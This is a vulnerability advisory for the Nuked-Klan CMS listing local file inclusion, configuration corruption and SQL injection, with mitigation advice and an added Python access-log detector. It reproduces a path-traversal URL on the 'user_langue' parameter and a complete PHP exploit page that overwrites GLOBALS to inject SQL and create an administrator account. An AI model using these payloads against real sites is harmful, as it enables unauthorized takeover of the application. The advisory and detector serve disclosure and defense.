vendor: Nuked-Klan
by: Unknown
CVSS: 7.5 (HIGH)
Information Disclosure, Configuration File Corruption, SQL Injection
CWE: 98
Product Name: Nuked-Klan
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:nuked-klan_project:nuked_klan
Metasploit:
Other Scripts:
Platforms Tested:

Nuked-Klan multiple vulnerabilities

Nuked-Klan is prone to multiple vulnerabilities: information disclosure through inclusion of local files, an issue that may permit remote attackers to corrupt configuration files, and SQL injection. Local files can be included by manipulating the 'user_langue' parameter of 'index.php'. An attacker can also create an admin account by overwriting the 'GLOBALS' variable; the exploit code below, written in PHP, demonstrates this. These issues can lead to unauthorized access to and control of the application.

Mitigation:

To mitigate these vulnerabilities, it is recommended to update to the latest version of Nuked-Klan and apply any available patches or security updates. Additionally, input validation and sanitization techniques should be implemented to prevent SQL injection attacks and unauthorized file inclusions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10104/info

Nuked-Klan is prone to multiple vulnerabilities. These issues include information disclosure via inclusion of local files, an issue that may permit remote attackers to corrupt configuration files and an SQL injection vulnerability.

- To include a local file:

http://www.example.com/index.php?user_langue=../../../../../file/to/view

- Create admin (overwriting GLOBALS) :

-------------------------------------------------------

<html>
<head>
<title>Nuked-KlaN b1.5 Create Admin</title>
</head>
<body>
<?
function ascii_sql($str) {
for ($i=0;$i < strlen($str);$i++) {
if ($i == strlen($str)-1){
$ascii_char.=ord(substr($str,$i));
}else{
$ascii_char.=ord(substr($str,$i)).',';
}
}
return $ascii_char;
}

if (isset($_POST["submit"])){

echo "<script>url='".$target."/index.php?
file=Suggest&op=add_sug&user_langue=../globals.php&nuked[prefix]=nuked_users%20
(id,pseudo,pass,niveau)%20VALUES%20(12345,char(".ascii_sql($_POST
["pseudo"])."),md5(char(".ascii_sql($_POST
["pass"]).")),9)/*&module=Gallery';window.open(url);</script>";
echo "<br><br><br><br>Admin should have been created.";

}else{
?>

<form method="POST" action="<? echo $PHP_SELF; ?>">
<b>Target :</b> <input type="text" name="target" value="http://"><br>
<b>Admin Nick :</b> <input type="text" name="pseudo"><br>
<b>Admin Pass :</b> <input type="text" name="pass"><br>
<input type="submit" name="submit" value="Create Admin">
</form>
<?
}
?>
</body>
</html>
-------------------------------------------------------
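
A defender-side check for the two request shapes shown above, as an added example that is not part of the original advisory or of Nuked-Klan: it scans web access-log lines for 'user_langue' values that are not plain language names and for query parameters that set 'nuked[...]' or 'GLOBALS'. The log lines are constructed, and the rule that legitimate 'user_langue' values are bare words is an assumption.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?file=News&user_langue=english HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?user_langue=../../../../../file/to/view HTTP/1.1" 200 812',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?user_langue=%2e%2e%2fglobals.php HTTP/1.1" 200 0',
    '192.0.2.12 - - [01/Jan/2024:10:00:20 +0000] "GET /index.php?file=Suggest&user_langue=../globals.php'
    '&nuked%5Bprefix%5D=t%20(a,b)%20VALUES%20(1,char(97))/*&module=Gallery HTTP/1.1" 200 40',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate user_langue values are bare language names such as "english".
SAFE_LANG_RE = re.compile(r'[A-Za-z_]{1,32}')
# Names no HTTP client should set: the page's request uses nuked[prefix]; its title names GLOBALS.
INTERNAL_NAMES = {'nuked', 'GLOBALS'}
SQL_HINT_RE = re.compile(r'(?i)\b(?:values|select|union)\b|char\s*\(|/\*')


def classify(target):
    """Return the sorted findings for one request target (path plus query string)."""
    findings = set()
    query = target.partition('?')[2]
    # parse_qsl percent-decodes names and values, so %2e%2e%2f and %5B are seen decoded.
    for name, value in parse_qsl(query, keep_blank_values=True):
        base = name.split('[', 1)[0]
        if base == 'user_langue' and not SAFE_LANG_RE.fullmatch(value):
            findings.add('user_langue-path')
        if base in INTERNAL_NAMES:
            findings.add('internal-variable-override')
            if SQL_HINT_RE.search(value):
                findings.add('sql-in-internal-variable')
    return sorted(findings)


def scan(lines):
    """Return (line_number, findings) for every log line with at least one finding."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

if __name__ == '__main__':
    for number, findings in scan(SAMPLE_LOG):
        print(number, ', '.join(findings))
```

Access logs usually record only the query string, so the same parameters sent in a POST body need the equivalent check at a WAF or in the application.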